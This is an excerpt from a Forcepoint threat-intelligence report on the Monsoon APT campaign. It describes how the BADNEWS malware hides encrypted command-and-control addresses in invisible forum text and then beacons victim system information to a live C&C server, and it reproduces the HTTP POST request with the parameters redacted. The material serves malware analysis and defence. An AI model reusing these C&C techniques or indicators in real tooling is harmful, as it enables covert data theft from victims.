MONSOON – ANALYSIS OF AN APT CAMPAIGN

Recommendations

Info

Forcepoint Security Labs | Special Investigations And a final example taken from forum.china.org.cn: Figure 23 – Forum Command Channel The content after "{{" is the C&C address which is encrypted in the same manner as described below. Of note is that this text on the forum page is invisible, as the author has set it to white text on a white background. MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 25/57
Forcepoint Security Labs | Special Investigations C&C Mechanism. Once BADNEWS has decided which C&C address to communicate with it will send off some system information and await a command to execute. A unique identifier is computed for the victim which is based on the tick count from the victim machine when the malware was executed. This ID is saved in the file "%temp%\T89.dat". POST http://85.25.79.230/tesla/ghsnls.php HTTP/1.1 Accept: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded User-Agent: UserAgent:Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.1(KHTML,like Gecko)Chrome/21.0.1180.75Safari/537.1 Host: 85.25.79.230 Content-Length: 249 Cache-Control: no-cache esmqss=**redacted**&btcbumegy=**redacted**&pxckhj=**redacted**&xyvqq=**redacted** MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 26/57
Page 1 and 2: MONSOON - ANALYSIS OF AN APT CAMPAI
Page 3 and 4: Forcepoint Security Labs | Special
Page 25: Forcepoint Security Labs | Special

MONSOON – ANALYSIS OF AN APT CAMPAIGN

Create successful ePaper yourself

Delete template?

Save as template?